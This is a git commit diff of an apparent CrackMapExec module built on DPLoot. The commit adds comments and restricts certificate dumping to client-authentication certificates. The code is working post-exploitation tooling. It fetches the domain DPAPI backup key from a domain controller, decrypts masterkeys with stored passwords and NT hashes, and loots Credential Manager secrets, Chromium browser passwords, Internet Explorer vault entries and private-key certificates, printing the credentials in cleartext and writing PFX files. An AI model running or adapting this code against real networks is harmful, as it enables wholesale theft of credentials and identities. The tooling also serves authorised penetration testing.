add comments and limit cert dump to clientauth cert

main
zblurx 2023-01-23 10:12:28 +01:00
parent a25dad9705
commit 66cd0799ab
1 changed files with 28 additions and 22 deletions

View File

@ -19,23 +19,23 @@ class CMEModule:
def options(self, context, module_options):
"""
PVK Domain backup key file
PVK Domain Backupkey file
MKFILE File with masterkeys in form of {GUID}:SHA1
DC_IP IP Address of the domain controller, will use to request domain backup key
DC_IP IP Address of the domain controller, will use to request Domain Backupkey
"""
self.pvkbytes = None
self.dc_ip = None
self.masterkeys = None
if "PVK" in module_options:
if "PVK" in module_options: # Used to give Domain Backup Key to the module in order to dump user related dpapi secrets
self.pvkbytes = open(module_options["PVK"], 'rb').read()
if "MKFILE" in module_options:
if "MKFILE" in module_options: # File with decrypted masterkeys
self.masterkeys = parse_masterkey_file(module_options["MKFILE"])
self.pvkbytes = open(module_options["MKFILE"], 'rb').read()
self.use_dc = False
if "DC_IP" in module_options:
if "DC_IP" in module_options: # If filled, will connect to it in order to request Domain Backupkey
self.dc_ip = module_options["DC_IP"]
self.use_dc = True
pass
@ -51,7 +51,7 @@ class CMEModule:
lmhash = getattr(connection, "lmhash", "")
nthash = getattr(connection, "nthash", "")
if self.use_dc :
if self.use_dc : # If the DC ip is filled, will connect to it with used account and dump Domain Backupkey
dc = Target.create(
domain=domain,
username=username,
@ -66,9 +66,9 @@ class CMEModule:
)
dc_conn = DPLootSMBConnection(dc)
dc_conn.connect()
dc_conn.connect() # Connect to DC
if dc_conn.is_admin:
if dc_conn.is_admin: # If is DA, dump Domain Backupkey
context.log.info("Downloading Domain Backupkey")
backupkey_triage = BackupkeyTriage(target=dc, conn=dc_conn)
backupkey = backupkey_triage.triage_backupkey()
@ -88,13 +88,15 @@ class CMEModule:
)
conn = DPLootSMBConnection(target)
conn.connect()
conn.connect() # Upgrade SMB connection to the target to DPLoot specific SMB connection
# Get cleartext passwords and nthashes from CMEDB in order to use them to decrypt masterkeys
plaintexts = {username:password for _, _, username, password, _,_ in context.db.get_credentials(credtype="plaintext")}
nthashes = {username:nt.split(':')[1] if ':' in nt else nt for _, _, username, nt, _,_ in context.db.get_credentials(credtype="hash")}
context.log.info("Gathering masterkeys")
# Collect User and Machine masterkeys
masterkeys_triage = MasterkeysTriage(target=target, conn=conn, pvkbytes=self.pvkbytes, passwords=plaintexts, nthashes=nthashes)
if self.masterkeys is None:
self.masterkeys = masterkeys_triage.triage_masterkeys()
@ -102,6 +104,7 @@ class CMEModule:
context.log.info("Looting secrets")
# Collect User and Machine Credentials Manager secrets
credentials_triage = CredentialsTriage(target=target, conn=conn, masterkeys=self.masterkeys)
credentials = credentials_triage.triage_credentials()
for credential in credentials:
@ -110,29 +113,32 @@ class CMEModule:
for credential in system_credentials:
context.log.highlight("[CREDENTIAL] %s - %s:%s" % (credential.target, credential.username, credential.password))
# Collect Chrome Based Browser stored secrets
browser_triage = BrowserTriage(target=target, conn=conn, masterkeys=self.masterkeys)
browser_credentials, _ = browser_triage.triage_browsers()
for credential in browser_credentials:
context.log.highlight("[%s] %s - %s:%s" % (credential.browser.upper(), credential.url, credential.username, credential.password))
# Collect User Internet Explorer stored secrets
vaults_triage = VaultsTriage(target=target, conn=conn, masterkeys=self.masterkeys)
vaults = vaults_triage.triage_vaults()
for vault in vaults:
if vault.type == 'Internet Explorer':
context.log.highlight("[Internet Explorer] %s - %s:%s" % (vault.resource, vault.username, vault.password))
# Collect User and Machine certificates with private keys
certificates_triage = CertificatesTriage(target=target,conn=conn, masterkeys=self.masterkeys)
certificates = certificates_triage.triage_certificates()
for certificate in certificates:
filename = "%s_%s.pfx" % (certificate.username,certificate.filename[:16])
context.log.success("Writting certificate to %s" % filename)
with open(filename, "wb") as f:
f.write(certificate.pfx)
if certificate.clientauth:
filename = "%s_%s.pfx" % (certificate.username,certificate.filename[:16])
context.log.success("Writting certificate to %s" % filename)
with open(filename, "wb") as f:
f.write(certificate.pfx)
system_certificates = certificates_triage.triage_system_certificates()
for certificate in system_certificates:
filename = "%s_%s.pfx" % (certificate.username,certificate.filename[:16])
context.log.success("Writting certificate to %s" % filename)
with open(filename, "wb") as f:
f.write(certificate.pfx)
if certificate.clientauth:
filename = "%s_%s.pfx" % (certificate.username,certificate.filename[:16])
context.log.success("Writting certificate to %s" % filename)
with open(filename, "wb") as f:
f.write(certificate.pfx)